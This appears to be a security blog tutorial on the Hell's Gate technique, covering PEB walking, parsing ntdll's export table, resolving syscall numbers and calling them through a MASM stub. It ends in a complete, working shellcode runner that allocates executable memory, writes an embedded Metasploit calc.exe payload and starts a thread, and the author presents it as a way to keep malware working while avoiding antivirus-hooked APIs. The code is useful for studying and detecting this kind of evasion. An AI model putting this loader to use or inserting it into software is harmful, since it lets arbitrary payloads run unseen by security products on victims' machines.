I’ve previously covered executing code with direct system calls. That approach creates a problem: it hardcodes system call numbers, which future versions of Windows may change.
Hell’s Gate is a method of dynamically looking up system call numbers so our malware will continue to work on future Windows releases.
Using a Debugger
Determining system call values using WinDbg is straightforward. The system call stubs are exported by ntdll.dll. We can use the unassemble (“u”) command to view the start of the NtOpenProcess function.
0:028> u ntdll!NtOpenProcess
ntdll!NtOpenProcess:
00007ffb`540e1f00 4c8bd1 mov r10,rcx
00007ffb`540e1f03 b826000000 mov eax,26h
00007ffb`540e1f08 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
00007ffb`540e1f10 7503 jne ntdll!NtOpenProcess+0x15 (00007ffb`540e1f15)
00007ffb`540e1f12 0f05 syscall
00007ffb`540e1f14 c3 ret
00007ffb`540e1f15 cd2e int 2Eh
00007ffb`540e1f17 c3 ret
The code moves the system call number (in this case, 0x26) into the EAX register. The third instruction then tests a flag in the shared user data page (SharedUserData+0x308) to decide whether to use the syscall instruction or fall back to the legacy int 2Eh interrupt.
The sections below describe the implementation steps you will need to take.
Define a PEB Data Structure
First, we need to determine the location of the Process Environment Block (PEB) in memory. This data structure provides metadata about the current process.
Since the PEB structure is only partially documented, start by creating a header file “PEB.h” that describes the fields we need.
#pragma once
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
typedef struct _PEB_LDR_DATA {
ULONG Length;
BOOLEAN Initialized;
BYTE Reserved1[3];
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
} PEB, * PPEB;
Locate the PEB and Identify the NTDLL.DLL Base Address
On x64, the GS segment register points to the current thread’s Thread Environment Block (TEB), which holds a pointer to the process’s PEB at offset 0x60. Once we have the PEB, we can traverse the InMemoryOrderModuleList to find loaded modules and their base addresses.
#include <windows.h>
#include <stdio.h>
#include "PEB.h"
int main() {
PPEB Peb = (PPEB)__readgsqword(0x60);
PLIST_ENTRY head = &Peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current != head) {
PLDR_DATA_TABLE_ENTRY entry =
(PLDR_DATA_TABLE_ENTRY)((BYTE*)current - sizeof(LIST_ENTRY));
wprintf(L"Module: %ws\n", entry->FullDllName.Buffer);
wprintf(L"Base: %p\n\n", entry->DllBase);
current = current->Flink;
}
return 0;
}
We can see the second entry is ntdll.dll. This is the module we’re interested in, since it contains the system call stubs.
Module: C:\GetPEB\GetPEB.exe
Base: 00007FF6E23E0000
Module: C:\WINDOWS\SYSTEM32\ntdll.dll
Base: 00007FFD78A80000
Module: C:\WINDOWS\System32\KERNEL32.DLL
Base: 00007FFD77950000
Module: C:\WINDOWS\System32\KERNELBASE.dll
Base: 00007FFD75FB0000
Module: C:\WINDOWS\SYSTEM32\VCRUNTIME140D.dll
Base: 00007FFD64A40000
Module: C:\WINDOWS\SYSTEM32\ucrtbased.dll
Base: 00007FFD1DD60000
Parse the NTDLL.dll Export Address Table
Next, we need to modify the code to look up functions only in the ntdll.dll module. We do this by parsing the module’s Export Address Table using the FindExport function.
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#include "PEB.h"
PVOID GetModuleBase(const wchar_t* moduleName) {
#ifdef _M_X64
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif
if (!peb || !peb->Ldr) return NULL;
PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current && current != head) {
PLDR_DATA_TABLE_ENTRY entry =
CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (entry->BaseDllName.Buffer &&
entry->BaseDllName.Length > 0 &&
entry->BaseDllName.Length < 512)
{
if (_wcsicmp(entry->BaseDllName.Buffer, moduleName) == 0) {
return entry->DllBase;
}
}
current = current->Flink;
}
return NULL;
}
PVOID FindExport(const wchar_t* moduleName, const char* functionName) {
BYTE* base = (BYTE*)GetModuleBase(moduleName);
if (!base) return NULL;
IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;
IMAGE_DATA_DIRECTORY dir =
nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (!dir.VirtualAddress || !dir.Size) return NULL;
IMAGE_EXPORT_DIRECTORY* exp =
(IMAGE_EXPORT_DIRECTORY*)(base + dir.VirtualAddress);
DWORD* functions = (DWORD*)(base + exp->AddressOfFunctions);
DWORD* names = (DWORD*)(base + exp->AddressOfNames);
WORD* ordinals = (WORD*)(base + exp->AddressOfNameOrdinals);
for (DWORD i = 0; i < exp->NumberOfNames; i++) {
const char* name = (const char*)(base + names[i]);
if (strcmp(name, functionName) == 0) {
DWORD rva = functions[ordinals[i]];
return base + rva;
}
}
return NULL;
}
int main() {
PVOID addr = FindExport(L"ntdll.dll", "NtAllocateVirtualMemory");
if (addr) {
printf("NtAllocateVirtualMemory: %p\n", addr);
}
else {
printf("Function not found.\n");
}
return 0;
}
Running the code should print the address of the NtAllocateVirtualMemory function.
NtAllocateVirtualMemory: 00007FFD78BE1DF0
With the function address, we can scan the first 32 bytes of the function for the opcode that moves an immediate value into the EAX register (0xB8).
DWORD GetSyscallNumber(PVOID func) {
BYTE* p = (BYTE*)func;
// scan first 32 bytes for "mov eax, imm32"
for (int i = 0; i < 32; i++) {
if (p[i] == 0xB8) { // opcode for mov eax, imm32
return *(DWORD*)(p + i + 1);
}
}
return 0;
}
Syscall Lookup Code
The following code implements our syscall lookup functionality.
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#include "PEB.h"
PVOID GetModuleBase(const wchar_t* moduleName) {
#ifdef _M_X64
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif
if (!peb || !peb->Ldr) return NULL;
PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current && current != head) {
PLDR_DATA_TABLE_ENTRY entry =
CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (entry->BaseDllName.Buffer &&
entry->BaseDllName.Length > 0 &&
entry->BaseDllName.Length < 512)
{
if (_wcsicmp(entry->BaseDllName.Buffer, moduleName) == 0) {
return entry->DllBase;
}
}
current = current->Flink;
}
return NULL;
}
PVOID FindExport(const wchar_t* moduleName, const char* functionName) {
BYTE* base = (BYTE*)GetModuleBase(moduleName);
if (!base) return NULL;
IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;
IMAGE_DATA_DIRECTORY dir =
nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (!dir.VirtualAddress || !dir.Size) return NULL;
IMAGE_EXPORT_DIRECTORY* exp =
(IMAGE_EXPORT_DIRECTORY*)(base + dir.VirtualAddress);
DWORD* functions = (DWORD*)(base + exp->AddressOfFunctions);
DWORD* names = (DWORD*)(base + exp->AddressOfNames);
WORD* ordinals = (WORD*)(base + exp->AddressOfNameOrdinals);
for (DWORD i = 0; i < exp->NumberOfNames; i++) {
const char* name = (const char*)(base + names[i]);
if (strcmp(name, functionName) == 0) {
DWORD rva = functions[ordinals[i]];
return base + rva;
}
}
return NULL;
}
DWORD GetSyscallNumber(PVOID func) {
BYTE* p = (BYTE*)func;
// scan first 32 bytes for "mov eax, imm32"
for (int i = 0; i < 32; i++) {
if (p[i] == 0xB8) { // opcode for mov eax, imm32
return *(DWORD*)(p + i + 1);
}
}
return 0;
}
int main() {
const char* functions[] = {
"NtAllocateVirtualMemory",
"NtWriteVirtualMemory",
"NtCreateThreadEx",
"NtOpenProcess",
};
int count = sizeof(functions) / sizeof(functions[0]);
for (int i = 0; i < count; i++) {
PVOID addr = FindExport(L"ntdll.dll", functions[i]);
if (!addr) {
printf("%s: not found\n\n", functions[i]);
continue;
}
printf("%s: %p\n", functions[i], addr);
DWORD syscall = GetSyscallNumber(addr);
if (syscall == 0) {
printf(" syscall: not detected\n\n");
}
else {
printf(" syscall: 0x%X (%u)\n\n", syscall, syscall);
}
}
return 0;
}
We can see the code has successfully resolved all the system call numbers we would need to execute shellcode 🙂
NtAllocateVirtualMemory: 00007FFD78BE1DF0
syscall: 0x18 (24)
NtWriteVirtualMemory: 00007FFD78BE2230
syscall: 0x3A (58)
NtCreateThreadEx: 00007FFD78BE3400
syscall: 0xC9 (201)
NtOpenProcess: 00007FFD78BE1FB0
syscall: 0x26 (38)
Entering Hell
Now that we have all the system call numbers, we still need a method of invoking them. We can’t execute a system call directly from C, and the 64-bit MSVC compiler does not support inline assembly, so we will need an assembly stub in a separate MASM file.
In Visual Studio, open the Project menu and select Build Customizations. Enable MASM.
Create a MASM file Syscall.asm with the following code. Right click the file and select Properties > Item Type. Set this to Microsoft Macro Assembler.
.data
wSystemCall DWORD 000h
.code
HellsGate PROC
mov wSystemCall, 000h
mov wSystemCall, ecx
ret
HellsGate ENDP
HellDescent PROC
mov r10, rcx
mov eax, wSystemCall
syscall
ret
HellDescent ENDP
end
The HellsGate function is used to select the system call to be invoked. It takes the first supplied argument (that will be in ECX) and stores it in wSystemCall. This is the system call value we supply from C++.
HellDescent is the function that actually executes the system call.
Technically, the logic of both functions could be merged into a single function. Keeping them separate can be beneficial if you want to execute the same system call multiple times.
Back in our C++ code, we will want to use an extern "C" block to reference the functions defined in the ASM file.
extern "C" {
void HellsGate(WORD wSystemCall);
// Using variadic arguments (...) allows you to pass any number of arguments to the syscall
NTSTATUS HellDescent(...);
}
Using variadic arguments as defined above allows us to supply an arbitrary number of parameters. The first four will be placed in registers as shown below; the rest will be placed on the stack.
| Register | Argument |
|---|---|
| RCX | arg1 |
| RDX | arg2 |
| R8 | arg3 |
| R9 | arg4 |
| R10 | Copy of RCX |
| EAX | Syscall number |
Finally, to turn this into a shellcode runner, we would need to call NtAllocateVirtualMemory, NtWriteVirtualMemory and NtCreateThreadEx.
//SYSCALL NtAllocateVirtualMemory
PVOID addr = FindExport(L"ntdll.dll", "NtAllocateVirtualMemory");
DWORD syscall = GetSyscallNumber(addr);
printf(" syscall: 0x%X (%u)\n\n", syscall, syscall);
HellsGate(syscall);
PVOID baseAddress = NULL;
SIZE_T shellcodeSizeAllocated = shellcodeSize;
NTSTATUS status = HellDescent(
(void*)(HANDLE)-1, // ProcessHandle (Current process)
&baseAddress,
0,
&shellcodeSizeAllocated,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
printf("Status: 0x%X\n", status);
//SYSCALL NtWriteVirtualMemory
PVOID addrWrite = FindExport(L"ntdll.dll", "NtWriteVirtualMemory");
DWORD syscallWrite = GetSyscallNumber(addrWrite);
printf("NtWriteVirtualMemory syscall: 0x%X\n", syscallWrite);
SIZE_T bytesWritten = 0;
HellsGate(syscallWrite);
printf("Actual size: %zu\n", shellcodeSize);
status = HellDescent(
(HANDLE)-1,
baseAddress,
shellcode,
(SIZE_T)shellcodeSize,
NULL
);
if (status == 0) {
printf("Shellcode is in memory at %p.\n", baseAddress);
}
else {
printf("Failed to write memory. Status: 0x%X\n", status);
}
//SYSCALL NtCreateThreadEx
PVOID addrThread = FindExport(L"ntdll.dll", "NtCreateThreadEx");
DWORD syscallThread = GetSyscallNumber(addrThread);
HellsGate(syscallThread);
HANDLE hThread = NULL;
status = HellDescent(
&hThread, // 1. ThreadHandle
THREAD_ALL_ACCESS, // 2. DesiredAccess
NULL, // 3. ObjectAttributes
(HANDLE)-1, // 4. ProcessHandle
baseAddress, // 5. StartAddress (The shellcode)
NULL, // 6. Parameter
FALSE, // 7. CreateFlags
0, // 8. ZeroBits
0, // 9. StackSize
0, // 10. MaxStackSize
NULL // 11. AttributeList
);
if (status == 0 && hThread != NULL) {
printf("Thread created successfully! Handle: %p\n", hThread);
WaitForSingleObject(hThread, INFINITE);
}
else {
printf("Failed to create thread. Status: 0x%X\n", status);
}
Complete Code Listing
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
#include "PEB.h"
PVOID GetModuleBase(const wchar_t* moduleName) {
#ifdef _M_X64
PPEB peb = (PPEB)__readgsqword(0x60);
#else
PPEB peb = (PPEB)__readfsdword(0x30);
#endif
if (!peb || !peb->Ldr) return NULL;
PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
PLIST_ENTRY current = head->Flink;
while (current && current != head) {
PLDR_DATA_TABLE_ENTRY entry =
CONTAINING_RECORD(current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (entry->BaseDllName.Buffer &&
entry->BaseDllName.Length > 0 &&
entry->BaseDllName.Length < 512)
{
if (_wcsicmp(entry->BaseDllName.Buffer, moduleName) == 0) {
return entry->DllBase;
}
}
current = current->Flink;
}
return NULL;
}
PVOID FindExport(const wchar_t* moduleName, const char* functionName) {
BYTE* base = (BYTE*)GetModuleBase(moduleName);
if (!base) return NULL;
IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
if (dos->e_magic != IMAGE_DOS_SIGNATURE) return NULL;
IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
if (nt->Signature != IMAGE_NT_SIGNATURE) return NULL;
IMAGE_DATA_DIRECTORY dir =
nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
if (!dir.VirtualAddress || !dir.Size) return NULL;
IMAGE_EXPORT_DIRECTORY* exp =
(IMAGE_EXPORT_DIRECTORY*)(base + dir.VirtualAddress);
DWORD* functions = (DWORD*)(base + exp->AddressOfFunctions);
DWORD* names = (DWORD*)(base + exp->AddressOfNames);
WORD* ordinals = (WORD*)(base + exp->AddressOfNameOrdinals);
for (DWORD i = 0; i < exp->NumberOfNames; i++) {
const char* name = (const char*)(base + names[i]);
if (strcmp(name, functionName) == 0) {
DWORD rva = functions[ordinals[i]];
return base + rva;
}
}
return NULL;
}
DWORD GetSyscallNumber(PVOID func) {
BYTE* p = (BYTE*)func;
// scan first 32 bytes for "mov eax, imm32"
for (int i = 0; i < 32; i++) {
if (p[i] == 0xB8) { // opcode for mov eax, imm32
return *(DWORD*)(p + i + 1);
}
}
return 0;
}
extern "C" {
void HellsGate(WORD wSystemCall);
// Using variadic arguments (...) allows you to pass
// any number of arguments to the syscall
NTSTATUS HellDescent(...);
}
int main() {
// MSF Calc Shellcode
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
//unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xEB, 0xFE };
SIZE_T shellcodeSize = sizeof(shellcode);
//SYSCALL NtAllocateVirtualMemory
PVOID addr = FindExport(L"ntdll.dll", "NtAllocateVirtualMemory");
DWORD syscall = GetSyscallNumber(addr);
printf(" syscall: 0x%X (%u)\n\n", syscall, syscall);
HellsGate(syscall);
PVOID baseAddress = NULL;
SIZE_T shellcodeSizeAllocated = shellcodeSize;
NTSTATUS status = HellDescent(
(void*)(HANDLE)-1, // ProcessHandle (Current process)
&baseAddress,
0,
&shellcodeSizeAllocated,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
printf("Status: 0x%X\n", status);
//SYSCALL NtWriteVirtualMemory
PVOID addrWrite = FindExport(L"ntdll.dll", "NtWriteVirtualMemory");
DWORD syscallWrite = GetSyscallNumber(addrWrite);
printf("NtWriteVirtualMemory syscall: 0x%X\n", syscallWrite);
SIZE_T bytesWritten = 0;
HellsGate(syscallWrite);
printf("Actual size: %zu\n", shellcodeSize);
status = HellDescent(
(HANDLE)-1,
baseAddress,
shellcode,
(SIZE_T)shellcodeSize,
NULL
);
if (status == 0) {
printf("Shellcode is in memory at %p.\n", baseAddress);
}
else {
printf("Failed to write memory. Status: 0x%X\n", status);
}
//SYSCALL NtCreateThreadEx
PVOID addrThread = FindExport(L"ntdll.dll", "NtCreateThreadEx");
DWORD syscallThread = GetSyscallNumber(addrThread);
HellsGate(syscallThread);
HANDLE hThread = NULL;
status = HellDescent(
&hThread, // 1. ThreadHandle
THREAD_ALL_ACCESS, // 2. DesiredAccess
NULL, // 3. ObjectAttributes
(HANDLE)-1, // 4. ProcessHandle
baseAddress, // 5. StartAddress (The shellcode)
NULL, // 6. Parameter
FALSE, // 7. CreateFlags
0, // 8. ZeroBits
0, // 9. StackSize
0, // 10. MaxStackSize
NULL // 11. AttributeList
);
if (status == 0 && hThread != NULL) {
printf("Thread created successfully! Handle: %p\n", hThread);
WaitForSingleObject(hThread, INFINITE);
}
else {
printf("Failed to create thread. Status: 0x%X\n", status);
}
return 0;
}
In Conclusion
Although this process is slightly convoluted, the Hell’s Gate method of identifying system call numbers by parsing the export address table removes the need to call functions like GetModuleHandleA or GetProcAddress, which may be hooked by anti-virus products.
It should be noted that the original POC performs each lookup once and stores the results in a lookup table. For the sake of brevity, I’ve omitted this.
The original research paper for Hell’s Gate can be found here.